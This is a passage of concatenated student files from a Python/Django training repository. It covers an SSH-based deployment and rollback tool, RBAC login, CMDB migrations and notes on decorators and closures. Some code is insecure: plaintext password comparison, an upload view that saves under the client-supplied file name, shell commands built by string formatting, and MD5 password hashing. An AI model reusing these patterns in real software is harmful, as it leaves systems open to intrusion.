deploy_object.uid) # 文件存放目录 sftp.put(code_file_path, target_file_path) transport.close() status = True except Exception as e: record_object.log = traceback.format_exc() print(traceback.format_exc()) record_object.save() return status # 相当于返回true往下执行 status = push_code() if not status: # 如果返回的不是true,就不往下执行了 return # 发布 def publish(): """ 上传脚本 执行脚本 :return: """ status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 创建脚本目录 code_file_path = os.path.join(cwd_path, deploy_object.uid) target_folder_path = '/home/yx/script/%s/%s/' % ( deploy_object.project.title, deploy_object.version) # /home/yx/script/dbhot/v4.0 stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传数据库里面的脚本内容到服务器 script_file_name = deploy_object.uid.split('.')[ 0] + "." 
+ deploy_object.script.interpreter # 脚本名字,项目名字+时间戳+.py # target_file_path = os.path.join(target_folder_path, script_file_name) # /home/yx/script/dbhot/v4.0 +脚本名字 file_object = sftp.open(target_file_path, mode='w') # 在指定目录下打开一个文件,然后写入 file_object.write(deploy_object.script.code) # 把数据库里面的脚本内容拿到 # # 执行脚本 command = 'python3 %s %s %s %s' % ( target_file_path, deploy_object.project.title, deploy_object.version, deploy_object.uid) # python3 /home/yx/script/dbhot/v4.0/dbhot20181228104300.py dbhot v4.0 dbhot20181228104300.zip print(command) stdin, stdout, stderr = ssh.exec_command(command) result = stdout.read() file_object.close() # 关闭刚才的写文件 transport.close() status = True return target_file_path except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status status = publish() if not status: # 如果是false就返回空,不往下执行了 return # 4 发布成功之后,更新主机状态 def update_status(): if not status: record_object.status = 3 record_object.log = '发布失败' record_object.save() else: record_object.status = 2 # 更新主机的发布状态, # 更新项目版本的发布状态 models.Deploy.objects.filter(project_id=project_id, version=deploy_object.version).update(status=3) # 更新主机的当前版本 models.DeployRecord.objects.filter(host=host_object).update( host_version=deploy_object.version) record_object.log='发布成功' record_object.save() update_status() # # pool = ThreadPoolExecutor(30) # for obj in host_list: # # pool.submit(task, obj, deploy_object) # pool.submit(task,obj,deploy_object) # pool.shutdown() for host in host_list: task(host, deploy_object) return redirect(memory_reverse(request, 'deploy_push', project_id=project_id, deploy_id=deploy_id)) def deploy_rollback(request, project_id, deploy_id): """ 回滚代码, :param request: :param project_id:项目id :param deploy_id:任务id :return: """ deploy_object_all = models.Deploy.objects.all() # 所有任务 deploy_object = models.Deploy.objects.filter(project_id=project_id).first() if request.method == 'GET': # 1. 显示发布信息 # 2. 
用户选择主机 host_id_list = request.POST.getlist('hosts') # 前端页面给选中的主机的id all_host_list = deploy_object.project.hosts.all() # 显示所有关联这个项目的主机 deployed_host_list = models.DeployRecord.objects.filter(deploy=deploy_object) # 这个项目里已经发布的主机 all_project_version = models.Deploy.objects.filter(project_id=project_id).values('version') # 当前项目的所有版本 deployed_host_dict = {item.host_id: item for item in deployed_host_list} # 主机id:主机名 return render(request, 'deploy_rollback_list.html', {'deploy_object': deploy_object, 'all_host_list': all_host_list, 'deployed_host_dict': deployed_host_dict, 'deploy_object_all': deploy_object_all, 'all_project_version': all_project_version, }) host_id_list = request.POST.getlist('hosts') # 前端页面给选中的主机的id host_list = models.Host.objects.filter(id__in=host_id_list) # 判断哪个主机是被选中的 deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() # host_log = models.RollbackRecord.objects.filter(deploy_id=deploy_id, host_id=host_id).values('rollback_log') # print(host_log) version_code_list = request.POST.getlist('version') # 前端页面选择的版本 version_code = ' '.join(version_code_list) # 转换成字符串 def task(host_object, deploy_object): # cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, # deploy_object.version) # 存放路径 # 1. 
在DeployRecord中更新一条回滚任务,在发布的时候生成的记录之上。 def create_deploy_record(): status = False try: record_object = models.RollbackRecord.objects.get_or_create(deploy=deploy_object, host=host_object, host_version=version_code) status = True return record_object except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status record_object, is_new = create_deploy_record() def publish(): """ 上传脚本 执行脚本 :return: """ status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 获取系统上面代码的存放的目录, target_folder_path = '/home/yx/codes/%s/%s' % ( deploy_object.project.title, version_code,) stdin, stdout, stderr = ssh.exec_command(' ls %s' % target_folder_path) code_dir_all = stdout.read().decode().split('\n') code_dir_name = code_dir_all[0] # print(code_dir_name,version_code) # 创建脚本目录 # code_file_path = os.path.join(cwd_path, deploy_object.uid) target_folder_path = '/home/yx/rollback_script/%s/' % (deploy_object.project.title) # 回滚脚本存放目录 print(target_folder_path) stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传数据库里面的脚本内容到服务器 script_file_name = deploy_object.uid.split('.')[ 0] + "." 
+ deploy_object.script.interpreter # 脚本名字,项目名字+时间戳+.py # 脚本存放的绝对路径 target_file_path = os.path.join(target_folder_path, script_file_name) # /home/yx/script/dbhot/a.py # print(target_file_path) file_object = sftp.open(target_file_path, mode='w') # 在指定目录下打开一个文件,然后写入 file_object.write(deploy_object.script.rollback_code) # 把数据库里面的脚本内容拿到 # # 执行回滚脚本 command = 'python3 %s %s %s %s' % ( target_file_path, deploy_object.project.title, version_code, code_dir_name) # python3 /home/yx/script/dbhot/v4.0/dbhot20181228104300.py stdin, stdout, stderr = ssh.exec_command(command) result = stdout.read() file_object.close() # 关闭刚才的写文件 transport.close() status = True return target_file_path except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status status = publish() # 4 回滚成功之后,更新主机状态 def update_status(): if not status: record_object.status = 3 record_object.log = '回滚失败' record_object.save() else: record_object.status = 2 # 更新主机的状态 # 更新项目版本的回滚状态 models.Deploy.objects.filter(project_id=project_id, version=deploy_object.version).update(status=4) # 更新主机的当前版本 models.DeployRecord.objects.filter(host=host_object).update( host_version=version_code) record_object.log = '回滚成功' record_object.save() update_status() # # pool = ThreadPoolExecutor(30) # for obj in host_list: # # pool.submit(task, obj, deploy_object) # pool.submit(task,obj,deploy_object) # pool.shutdown() for host in host_list: task(host, deploy_object) return redirect(memory_reverse(request, 'deploy_rollback', project_id=project_id, deploy_id=deploy_id)) <file_sep>/day22/luffy_permission/web/views/user.py ''' 跟用户相关的视图都写在这里 ''' from django.shortcuts import redirect, render, HttpResponse from rbac.models import UserInfo from rbac.service.permission import init_permission def login(request): error_msg = "" if request.method == "POST": # 取用户名和密码 username = request.POST.get("username") pwd = request.POST.get("password") # 验证 user_obj = UserInfo.objects.filter(username=username, 
password=pwd).first() if user_obj: # 登录成功 # 调用封装好的初始化函数里面含有权限列表和显示菜单 init_permission(request,user_obj) return redirect("/customer/list/") else: error_msg = "用户名或密码错误" return render(request, "login.html",locals()) <file_sep>/day23/auto - 2 - 固定二级菜单示例/web/modelform.py from django.forms import ModelForm from django import forms from web import models class OrderModelForm(forms.ModelForm): class Meta: model = models.Order fields = "__all__" error_messages = { # 设置每个字段的报错提示信息 "name": { "required": "订单名字不能为空" }, } <file_sep>/auto_server/repository/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-09-30 02:09 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Disk', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=8, verbose_name='插槽位')), ('model', models.CharField(max_length=32, verbose_name='磁盘型号')), ('capacity', models.FloatField(verbose_name='磁盘容量GB')), ('pd_type', models.CharField(max_length=32, verbose_name='磁盘类型')), ], options={ 'verbose_name_plural': '硬盘表', }, ), migrations.CreateModel( name='Memory', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('slot', models.CharField(max_length=32, verbose_name='插槽位')), ('manufacturer', models.CharField(blank=True, max_length=32, null=True, verbose_name='制造商')), ('model', models.CharField(max_length=64, verbose_name='型号')), ('capacity', models.FloatField(blank=True, null=True, verbose_name='容量')), ('sn', models.CharField(blank=True, max_length=64, null=True, verbose_name='内存SN号')), ('speed', models.CharField(blank=True, max_length=16, null=True, verbose_name='速度')), ], options={ 'verbose_name_plural': '内存表', }, ), migrations.CreateModel( name='NIC', 
fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=128, verbose_name='网卡名称')), ('hwaddr', models.CharField(max_length=64, verbose_name='网卡mac地址')), ('netmask', models.CharField(max_length=64)), ('ipaddrs', models.CharField(max_length=256, verbose_name='ip地址')), ('up', models.BooleanField(default=False)), ], options={ 'verbose_name_plural': '网卡表', }, ), migrations.CreateModel( name='Server', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hostname', models.CharField(max_length=128, unique=True)), ('sn', models.CharField(db_index=True, max_length=64, verbose_name='SN号')), ('manufacturer', models.CharField(blank=True, max_length=64, null=True, verbose_name='制造商')), ('model', models.CharField(blank=True, max_length=64, null=True, verbose_name='型号')), ('manage_ip', models.GenericIPAddressField(blank=True, null=True, verbose_name='管理IP')), ('os_platform', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统')), ('os_version', models.CharField(blank=True, max_length=16, null=True, verbose_name='系统版本')), ('cpu_count', models.IntegerField(blank=True, null=True, verbose_name='CPU个数')), ('cpu_physical_count', models.IntegerField(blank=True, null=True, verbose_name='CPU物理个数')), ('cpu_model', models.CharField(blank=True, max_length=128, null=True, verbose_name='CPU型号')), ('create_at', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name_plural': '服务器表', }, ), migrations.AddField( model_name='nic', name='server_obj', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='nic', to='repository.Server'), ), migrations.AddField( model_name='memory', name='server_obj', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='memory', to='repository.Server'), ), migrations.AddField( model_name='disk', name='server_obj', 
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disk', to='repository.Server'), ), ] <file_sep>/day7/student_guanlisystem/core/teacher.py class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class Teacher(Foo): def __init__(self,name): self.name=name<file_sep>/day7/configparser模块.py #configparser 用的不多 #该模块适用于配置文件的格式与windows ini文件类似,可以包含一个或多个节(section),每个节可以有多个参数(键=值)。 import configparser #写文件, ''' config = configparser.ConfigParser() config["DEFAULT"] = {'ServerAliveInterval': '45', 'Compression': 'yes', 'CompressionLevel': '9', 'ForwardX11':'yes' } config['bitbucket.org'] = {'User':'hg'} config['topsecret.server.com'] = {'Host Port':'50022','ForwardX11':'no'} with open('example.ini', 'w') as f: config.write(f) ''' #查找配置文件 config = configparser.ConfigParser() print(config.sections()) config.read('example.ini') print(config.sections()) # print('bytebong.com' in config) # False # print('bitbucket.org' in config) # True # print(config['bitbucket.org']["user"]) # hg # print(config['DEFAULT']['Compression']) #yes # print(config['topsecret.server.com']['ForwardX11']) #no # print(config['bitbucket.org']) #<Section: bitbucket.org> 生成器 # for key in config['bitbucket.org']: # 注意,有default会默认default的键 # print(key) # print(config.options('bitbucket.org')) # 同for循环,找到'bitbucket.org'下所有键 # print(config.items('bitbucket.org')) #找到'bitbucket.org'下所有键值对 # print(config.get('bitbucket.org','compression')) # yes get方法Section下的key对应的value #更改配置文件选项 # config = configparser.ConfigParser() # config.read('example.ini') # config.add_section('yuan') # config.remove_section('bitbucket.org') # config.remove_option('topsecret.server.com',"forwardx11") # config.set('topsecret.server.com','k1','11111') # config.set('yuan','k2','22222') # # config.write(open('example.ini', "w"))<file_sep>/day19/CMS/static/js/login.js // 设置错误信息鼠标点击input自动消失 $(".login-box input").focus(function () { 
$(".login-error").text(""); } ); // 设置验证码点击变化 $("#v-code-img").click(function () { this.src+="?" });<file_sep>/day19/form之前/templates/book_list.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>展示页面</title> <link rel="stylesheet" href="/static/bootstrap-3.3.7/css/bootstrap.min.css"> </head> <body> <div class="row"> <div class="col-md-offset-2 col-md-6"> <table class="table table-hover"> <thead> <tr> <td>序号</td> <td>id</td> <td>书名</td> <td>创建日期</td> <td>出版社</td> <td>作者</td> <td>操作</td> </tr> </thead> <tbody> {% for book in book_obj %} <tr> <td>{{ forloop.counter }}</td> <td>{{ book.id }}</td> <td>{{ book.title }}</td> <td>{{ book.publisher_date }}</td> <td>{{ book.publisher }}</td> <td>{{ book.authors.all}}</td> <td> <a href="">删除</a> <a href="/edit_book/{{ book.id }}/">编辑</a> </td> </tr> {% endfor %} </tbody> </table> <a class="btn btn-info" href="/add_book/">添加</a> </div> </div> </body> </html><file_sep>/day6/继承.py # 继承概念 继承是一种创建新类的方式,在python中,新建的类可以继承一个或多个父类,父类又可称为基类或超类,新建的类称为派生类或子类 ''' class Animal: def __init__(self,name,dps,hp): self.name=name self.dps=dps self.hp=hp def eat(self): print('%s吃药,回血了'%(self.name)) class Person(Animal): def __init__(self,name,dps,hp,sex): super().__init__(name,dps,hp) #第二中写法 Animal.__init__(self,name,dps,hp) self.sex=sex def attack(self,dog): dog.hp -= self.dps print('%s打了%s,%s掉了%s点血,%s还剩%s点血'%(self.name,dog.name,dog.name,self.dps,dog.name,dog.hp)) class Dog(Animal): def __init__(self,name,dps,hp,kind): super().__init__(name,dps,hp) self.kind=kind def bite(self,person): person.hp -= self.dps print('%s咬了%s,%s掉了%s点血,%s还剩%s点血' % (self.name, person.name, person.name, self.dps, person.name, person.hp)) alex=Person('alex',5,250,'男') ha2=Dog('小黑',200,2000,'藏獒') print(alex.__dict__) print(ha2.__dict__) alex.attack(ha2) ha2.bite(alex) ha2.eat() ''' #寻找init方法的步骤 #先找对象的内存空间 - 创建这个对象的类的内存空间(子类) - 父类的内存空间 #面试题 class Foo: def __init__(self): self.func() def func(self): print('in Foo') class Son(Foo): def func(self): 
print('in Son') Son() #实例化了一个对象,找自己方法里面的self,然后再去执行父类里面的self,然后又去调用func,所以打印in son<file_sep>/day9/进程/队列.py from multiprocessing import Queue,Process def func(q,num): try: t = q.get_nowait() #拿一张票 print("%s抢到票了"%num) except:pass if __name__ == '__main__': q = Queue() q.put(1) #往里面放一张票 for i in range(10):#创建了10个人去抢一张票 Process(target=func,args=(q,i)).start() # 管道 + 锁 == 队列 # 管道也是一个可以实现进程之间通信的模型 # 但是管道没有锁,数据不安全 # 消息中间件 # memcache # rabitmq # kafka —— 大数据相关 # redis<file_sep>/day4/二分法.py ##使用二分法的前提是列表必须是从小到大排序的 # l=[1,3,34,56,76,87,98,123] # def search(l,number): # print(l) # if len(l) ==0: # print('number not exist') # return # num_index=len(l) // 2 # if number > l[num_index]: # #往右找 # search(l[num_index+1:],number) # elif number < l[num_index]: # #往左找 # search(l[0:num_index],number) # else: # print('find it') # search(l,234) def cal(l,num,start=0,end=None): <file_sep>/day2/03 dict.py dic = {'name':'taibai','age':21,'hobby':'girl',} #增 dic['high'] = 180 print (dic) #删除 dic.pop('name') print (dic) #改 dic['name'] = 'bob' print (dic) #查 dic.get('name') print (dic.get('name')) #len #fromkeys <file_sep>/练习/test.py import os # path = 'file' path=r'D:\file' print('正在读写文件,请稍等......') for filename in os.listdir(path): fullname = os.path.join(path, filename) # print(fullname) # f = open(fullname, 'rb') # f_read = f.read().decode('gbk') # # print(f_read) # f.close() # # f2 = open('full.xls', encoding='gbk', mode='a+') # # f2.write(f_read) # f2.close() # 如果是linux系统导出来的数据用utf-8,如果是windows则用gbk f1 = open(fullname, encoding='utf-8') try: for i in f1: if "电子邮箱" in i: continue with open('test.xls',encoding='gbk',mode='a+')as f2: f2.write(i) f2.close() f1.close() except Exception: print(fullname) <file_sep>/cmdb/auto_client - 7 - 资产信息入库/config/settings.py #!/usr/bin/python # -*- coding:utf-8 -*- import os BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) ENGINE_HANDLERS = { 'agent':'src.engine.agent.AgentHandler', 'ssh':'src.engine.ssh.SSHHandler', 
'salt':'src.engine.salt.SaltHandler', } ENGINE = 'agent' # ########### SSH模式 ########### # 私钥地址 SSH_PRIVATE_KEY = <KEY>' SSH_PORT = 22 SSH_USER = 'cmdb' # ############################## 插件 ################################ PLUGIN_DICT = { 'basic':'src.plugins.basic.Basic', 'disk':'src.plugins.disk.Disk', 'memory':'src.plugins.memory.Memory', 'nic':'src.plugins.network.Network', 'cpu':'src.plugins.cpu.Cpu', 'board':'src.plugins.main_board.MainBoard', } DEBUG = True ASSET_API = "http://127.0.0.1:8000/api/asset/" # #################### 日志路径 ################# LOG_FILE_PATH = os.path.join(BASEDIR,'log','cmdb.log') # #################### 唯一标识路径 ################# CERT_FILE_PATH = os.path.join(BASEDIR,'config','cert')<file_sep>/day19/homework/s21/static/js/login.js $(".login-box input").focus(function () { $(".error_msg").text(""); } );<file_sep>/day3/装饰器.py # def wrapper(): # def inner(): # name1 = 'alex' # print(name1) # inner() # wrapper() # def wrapper(): # name1 = 'wusir' # print(name1) # def inner(): # name = 'alex' # print(name) # return inner # ret = wrapper() # ret() ##inner返回给了ret,所以直接执行ret()相当于执行了inner() ##测试一个函数执行效率 import time # def func1(): # # print('hello world') # # time.sleep(0.3) # # ##最简单的装饰器 # # def timer(f1): #f1 = func1 # # def inner(): # # start_time = time.time() # # f1() ##相当于执行func1() # # end_time = time.time() # # print('此函数的执行效率%s' %(end_time - start_time)) # # return inner ##inner返回给了func1 # # func1 = timer(func1) # # func1() ##执行inner() #@ 第二种装饰器 # def timer(f1): # def inner(): # start_time = time.time() # f1() # end_time = time.time() # print('此函数的执行效率是%s' % (end_time-start_time)) # return inner # # @timer ##func1 = timer(func1) =inner # def func1(): # print('hello world') # time.sleep(0.3) # func1() ##相当于执行了inner() ,然后返回到上面 执行inner里面的语句, # @timer # def func2(): # print('你好,世界') # time.sleep(0.4) # func2() ##被装饰的函数带参数 # def timer(f1): ##f1 = func1 # def inner (*args,**kwargs): # start_time = time.time() # f1(*args,**kwargs) 
##func1函数是在这步开始执行的func1(111,222) # end_time = time.time() # print('此函数的执行效率是%s' %(end_time-start_time)) # return inner # @timer #func1 = timer(func1) ##inner=func1 # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.9) # func1(111,222) ##inner 把 111和222传给了上面的inner(*args) ##带返回值的装饰器 # def timer(f1): # def inner(*args,**kwargs): # start_time = time.time() # ret = f1(*args,**kwargs) ##func1(111,222) # end_time = time.time() # print('此函数执行效率%s' % (end_time-start_time)) # return ret ##返回给了func1 # return inner # @timer #func1 = timer(func1) # def func1(a,b): # print(a,b) # print('hello world') # time.sleep(0.4) # return 666 # ret2 = func1(111,222) ##inner(111,222) # print(ret2) def diary(): a = ('-----欢迎来到日记页面-----') return a print(diary())<file_sep>/day3/函数的进阶.py ##函数里面声明的变量叫临时名称空间,存入函数里面的变量与值的关系,随着函数的执行结束, # 临时名称空间消失 # name = 'wusir' ##全局命名空间 # age = 12 # def func1(): # name1 = 'wusir' ##局部命名空间 # age1 = 34 # return name1 # print(func1()) # print(name) # name1 = 'wusir' # def func1(): # print(name1) # def func2(): # print('xxxxx',name1) # func2() # func1() # name1 = 'wusir' # def func1(): # name2 = 'laonanhai' # print(globals()) ##查看全局变量 # print(locals()) ##查看局部变量 # func1() ##global nonlocal 关键字 #global ##声明一个全局变量(限于字符串,数字) # name = 'wusir' # def func1(): # global name ##声明一个全局变量 # name = 'alex' # return # func1() # print(name) ##打印的结果是alex #对可变数据类型(list,dict,set)可以直接引用不用通过global。 # li = [1,2,3] # dic = {'a':'b'} # # def change(): # li.append('a') # dic['q'] = 'g' # print(dic) # print(li) # change() # print(li) # print(dic) #nonlocal ##1不能修改全局变量 #2在局部作用域中,对父级作用域(或者更外层作用域非全局作用域)的变量进行引用和修改, # 并且引用的哪层,从那层及以下此变量全部发生改变 # def func2(): # name1 = 'alex' # print('+',name1) # def inner(): # nonlocal name1 # name1 = 'wusir' # print('*',name1) # def inner1(): # pass # inner() # print('%',name1) # func2() ##函数名(就是def后面的那个字符串) # #1 可以互相赋值 # def func1(): # print(666) # f1 = func1 # f1() #2 函数名可以当成函数的参数 # def func1(): # print(777) # def func2(argv): # argv() # 
print(999) # func2(func1) #可以当成容器类数据类型的参数 # def func1(): # # print(666) # # def func2(): # # print(777) # # def func3(): # # print(888) # # ll = [func1,func2,func3] # # for i in ll: # # i() #函数名可以当成函数的返回值 # def func1(): # print(666) # def func2(argv): # print(777) # return argv # ret = func2(func1) # ret() # 闭包 内层函数对外层函数非全局变量的引用,叫做闭包 #闭包的好处:如果python 检测到闭包, # 他有一个机制,你的局部作用域不会随着函数的结束而结束 ##闭包 # def wrapper(): # name1 = '老男孩' # def inner(): # print(name1) # inner() # print(inner.__closure__) ##如果返回是cell是闭包 # wrapper() # name1 = '老男孩' # def wrapper(): # def inner(): # print(name1) # inner() # print(inner.__closure__) ##返回none不是闭包 # wrapper() name = 'alex' def wrapper(argv): def inner(): print(argv) inner() print(inner.__closure__) # cell wrapper(name)<file_sep>/day8/ftp作业/client_login.py import hashlib import configparser import socket import struct import json # def login(self): # sk=socket.socket() # sk.connect(('127.0.0.1',8090)) # userinfo=[] # while True: # username=input('请输入你的用户名') # userinfo.append(username) # pwd=input('请输入你的密码:') # #userinfo.append(pwd) # hash_user = hashlib.md5(username.encode('utf-8')) # hash_pwd=hash_user.update(pwd.encode('utf-8')) # md5_pwd=hash_user.hexdigest() # userinfo.append(md5_pwd) # userinfo_byttes = bytes(json.dumps(userinfo),encoding='utf-8') # 把列表转换成bytes # sk.send(userinfo_byttes) # ret=sk.recv(1024).decode('utf-8') # print(ret) # # sk.close() # if __name__=='__main__': # login() class Client(): def __init__(self,ip_port): self.ip_port=ip_port #@classmethod def init_sokcet(self): global sk sk = socket.socket() sk.connect((self.ip_port)) def login(self): global sk userinfo = [] while True: username=input('请输入你的用户名') userinfo.append(username) pwd=input('请输入你的密码:') #userinfo.append(pwd) hash_user = hashlib.md5(username.encode('utf-8')) hash_pwd=hash_user.update(pwd.encode('utf-8')) md5_pwd=hash_user.hexdigest() userinfo.append(md5_pwd) userinfo_byttes = bytes(json.dumps(userinfo),encoding='utf-8') # 把列表转换成bytes while True: # 
sk=Client.init_sokcet() # sk.send(userinfo_byttes) sk.send(userinfo_byttes) ret=sk.recv(1024).decode('utf-8') print(ret) sk.close() client=Client(('127.0.0.1',8090)) client.login()<file_sep>/day21/RTF/app01/views.py from django.shortcuts import render,HttpResponse import os from django.http import JsonResponse # json格式 # Create your views here. # 富文本编辑器上传图片的视图 def upload_img(request): print(request.FILES) res = {"error": 0} # 这是固定写法,必须用error file_obj = request.FILES.get("imgFile") file_path = os.path.join("upload", "report_images", file_obj.name) # 将文件保存在本地 with open(file_path, "wb") as f: for chunk in file_obj.chunks(): f.write(chunk) # 将上传文件的url返回给富文本编辑器 res["url"] = "/media/report_images/{}".format(file_obj.name) return JsonResponse(res) def index(request): return render(request, "index.html", locals())<file_sep>/day20/CMS/fault_reporting/migrations/0002_auto_20180904_1037.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-09-04 02:37 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('fault_reporting', '0001_initial'), ] operations = [ migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.CharField(max_length=255)), ('create_time', models.DateTimeField(auto_now_add=True)), ], options={ 'verbose_name': '评论', 'verbose_name_plural': '评论', }, ), migrations.CreateModel( name='Fault2Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], options={ 'verbose_name': '故障-标签', 'verbose_name_plural': '故障-标签', }, ), migrations.CreateModel( name='FaultDetail', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.TextField()), ], options={ 'verbose_name': '故障详情表', 'verbose_name_plural': '故障详情表', }, ), 
migrations.CreateModel( name='FaultReport', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=80, verbose_name='故障标题')), ('desc', models.CharField(max_length=255, verbose_name='故障简介')), ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='发布时间')), ('modify_time', models.DateTimeField(auto_now=True, verbose_name='最后修改时间')), ('comment_count', models.IntegerField(default=0)), ('up_count', models.IntegerField(default=0)), ('down_count', models.IntegerField(default=0)), ], options={ 'verbose_name': '故障总结/故障报告', 'verbose_name_plural': '故障总结/故障报告', }, ), migrations.CreateModel( name='LOB', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, unique=True, verbose_name='业务线名称')), ], options={ 'verbose_name': '业务线', 'verbose_name_plural': '业务线', }, ), migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, unique=True, verbose_name='标签名称')), ], options={ 'verbose_name': '标签', 'verbose_name_plural': '标签', }, ), migrations.CreateModel( name='UpDown', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('is_up', models.BooleanField(default=True, verbose_name='支持/反对')), ('fault_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport', verbose_name='故障总结')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo', verbose_name='用户')), ], options={ 'verbose_name': '支持/反对', 'verbose_name_plural': '支持/反对', }, ), migrations.AddField( model_name='faultreport', name='lob', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.LOB', verbose_name='所属业务线'), ), 
migrations.AddField( model_name='faultreport', name='tags', field=models.ManyToManyField(through='fault_reporting.Fault2Tag', to='fault_reporting.Tag'), ), migrations.AddField( model_name='faultreport', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo', verbose_name='发布者'), ), migrations.AddField( model_name='faultdetail', name='fault', field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport'), ), migrations.AddField( model_name='fault2tag', name='fault_report', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport'), ), migrations.AddField( model_name='fault2tag', name='tag', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.Tag'), ), migrations.AddField( model_name='comment', name='fault_report', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.FaultReport', verbose_name='故障总结'), ), migrations.AddField( model_name='comment', name='parent_comment', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.Comment'), ), migrations.AddField( model_name='comment', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fault_reporting.UserInfo'), ), migrations.AlterUniqueTogether( name='updown', unique_together=set([('fault_report', 'user')]), ), migrations.AlterUniqueTogether( name='fault2tag', unique_together=set([('fault_report', 'tag')]), ), ] <file_sep>/day4/3.装饰器.py # 装饰器 # 在原有的函数前后增加功能,且不改变原函数的调用方式 # 计算一个函数的运行之间 # import time # def timmer(f): # def inner(*args,**kwargs): # start_time = time.time() # ret = f(*args,**kwargs) # end_time = time.time() # print(end_time - start_time) # return ret # return inner # # @timmer # func = timmer(func) # def func(a,b): # print('begin func',a) # time.sleep(0.1) # print('end func',b) # return True # # ret = 
func(1,2) #--> inner() # def timmer(f): # def inner(*args,**kwargs): # # ret = f(*args,**kwargs) # # return ret # return inner # 进阶的需求 # 第一种情况 # 500个函数 # 你可以设计你的装饰器 来确认是否生效 # import time # FLAG = True # def outer(flag): # def timmer(f): # def inner(*args,**kwargs): # if flag == True: # start_time = time.time() # ret = f(*args,**kwargs) # end_time = time.time() # print(end_time - start_time) # else: # ret = f(*args, **kwargs) # return ret # return inner # return timmer # # @outer(FLAG) # func = timmer(func) # def func(a,b): # print('begin func',a) # time.sleep(0.1) # print('end func',b) # return True # # func(1,2) # 第二种情况 def wrapper1(func): def inner1(): print('wrapper1 ,before func') func() print('wrapper1 ,after func') return inner1 def wrapper2(func): def inner2(): print('wrapper2 ,before func') func() print('wrapper2 ,after func') return inner2 @wrapper2 @wrapper1 def f(): print('in f') # f() # 装饰器 登录 记录日志 import time login_info = {'alex':False} def login(func): # manager def inner(name): if login_info[name] != True: user = input('user :') pwd = input('pwd :') if user == 'alex' and pwd == '<PASSWORD>': login_info[name] = True if login_info[name] == True: ret = func(name) # timmer中的inner return ret return inner def timmer(f): def inner(*args,**kwargs): start_time = time.time() ret = f(*args,**kwargs) # 调用被装饰的方法 end_time = time.time() # print(end_time - start_time) return ret return inner @login @timmer def index(name): print('欢迎%s来到博客园首页~'%name) @login @timmer # manager = login(manager) def manager(name): print('欢迎%s来到博客园管理页~'%name) index('alex') index('alex') manager('alex') manager('alex') # 